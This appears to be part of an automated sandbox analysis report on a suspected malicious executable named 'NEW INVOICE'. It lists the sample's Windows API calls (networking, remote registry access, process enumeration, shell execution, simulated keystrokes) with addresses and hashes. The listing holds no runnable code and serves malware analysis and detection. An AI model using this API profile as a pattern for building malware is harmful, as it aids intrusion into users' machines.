                                                                                    • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                    • String ID:
                                                                                    • API String ID: 1925773019-0
                                                                                    • Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                    • Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
                                                                                    • Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                    • Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
                                                                                    APIs
                                                                                    • VariantClear.OLEAUT32(00000038), ref: 004357C3
                                                                                    • VariantClear.OLEAUT32(00000058), ref: 004357C9
                                                                                    • VariantClear.OLEAUT32(00000068), ref: 004357CF
                                                                                    • VariantClear.OLEAUT32(00000078), ref: 004357D5
                                                                                    • VariantClear.OLEAUT32(00000088), ref: 004357DE
                                                                                    • VariantClear.OLEAUT32(00000048), ref: 004357E4
                                                                                    • VariantClear.OLEAUT32(00000098), ref: 004357ED
                                                                                    • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClearVariant
                                                                                    • String ID:
                                                                                    • API String ID: 1473721057-0
                                                                                    • Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                    • Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
                                                                                    • Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                    • Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64
                                                                                    APIs
                                                                                    • WSAStartup.WSOCK32(00000101,?,?), ref: 00464ADE
                                                                                      • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                    • inet_addr.WSOCK32(?,00000000,?,?,00000101,?,?), ref: 00464B1F
                                                                                    • gethostbyname.WSOCK32(?,?,00000000,?,?,00000101,?,?), ref: 00464B29
                                                                                    • _memset.LIBCMT ref: 00464B92
                                                                                    • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                                                                                    • WSACleanup.WSOCK32 ref: 00464CE4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
                                                                                    • String ID:
                                                                                    • API String ID: 3424476444-0
                                                                                    • Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                    • Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
                                                                                    • Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                    • Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
                                                                                    APIs
                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MetricsSystem
                                                                                    • String ID:
                                                                                    • API String ID: 4116985748-0
                                                                                    • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                    • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                                                                                    • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                    • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                                                                                    APIs
                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConnectRegistry_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 535477410-0
                                                                                    • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                    • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                                                                                    • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                    • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                                                                                    APIs
                                                                                      • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                      • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                    • _memset.LIBCMT ref: 004538C4
                                                                                    • GetMenuItemInfoW.USER32(?,?), ref: 004538EF
                                                                                    • _wcslen.LIBCMT ref: 00453960
                                                                                    • SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                                                                                    • String ID: 0
                                                                                    • API String ID: 3530711334-4108050209
                                                                                    • Opcode ID: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
                                                                                    • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                                                                                    • Opcode Fuzzy Hash: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
                                                                                    • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                                                                                    APIs
                                                                                    • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                    • String ID: HH
                                                                                    • API String ID: 3488606520-2761332787
                                                                                    • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                    • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                                                                                    • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                    • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
                                                                                    APIs
                                                                                      • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                      • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                      • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                    • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                    • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                    • LineTo.GDI32(?,?), ref: 004474BF
                                                                                    • CloseFigure.GDI32(?), ref: 004474C6
                                                                                    • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                    • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                    • String ID:
                                                                                    • API String ID: 4082120231-0
                                                                                    • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                    • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                                                                    • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                    • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                                                                                    APIs
                                                                                      • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                      • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                      • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                    • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                    • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                    • LineTo.GDI32(?,?), ref: 004474BF
                                                                                    • CloseFigure.GDI32(?), ref: 004474C6
                                                                                    • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                    • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                    • String ID:
                                                                                    • API String ID: 4082120231-0
                                                                                    • Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                    • Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
                                                                                    • Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                    • Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                                                                                    • String ID:
                                                                                    • API String ID: 288456094-0
                                                                                    • Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                    • Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
                                                                                    • Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                    • Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
                                                                                    APIs
                                                                                    • GetParent.USER32(?), ref: 004449B0
                                                                                    • GetKeyboardState.USER32(?), ref: 004449C3
                                                                                    • SetKeyboardState.USER32(?), ref: 00444A0F
                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                    • String ID:
                                                                                    • API String ID: 87235514-0
                                                                                    • Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                    • Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
                                                                                    • Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                    • Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
                                                                                    APIs
                                                                                    • GetParent.USER32(?), ref: 00444BA9
                                                                                    • GetKeyboardState.USER32(?), ref: 00444BBC
                                                                                    • SetKeyboardState.USER32(?), ref: 00444C08
                                                                                    • PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
                                                                                    • PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
                                                                                    • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
                                                                                    • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                    • String ID:
                                                                                    • API String ID: 87235514-0
                                                                                    • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                    • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                                                                                    • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                    • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                    • Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
                                                                                    • Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                    • Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
                                                                                    APIs
                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConnectRegistry_wcslen
                                                                                    • String ID: HH
                                                                                    • API String ID: 535477410-2761332787
                                                                                    • Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                    • Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
                                                                                    • Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                    • Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00457C34
                                                                                    • _memset.LIBCMT ref: 00457CE8
                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00457D34
                                                                                      • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                      • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                    • CloseHandle.KERNEL32(?), ref: 00457DDD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                                                                                    • String ID: <$@
                                                                                    • API String ID: 1325244542-1426351568
                                                                                    • Opcode ID: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                                                                                    • Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
                                                                                    • Opcode Fuzzy Hash: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                                                                                    • Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                                                                    • __wsplitpath.LIBCMT ref: 004737E1
                                                                                      • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                    • _wcscat.LIBCMT ref: 004737F6
                                                                                    • __wcsicoll.LIBCMT ref: 00473818
                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                    • String ID:
                                                                                    • API String ID: 2547909840-0
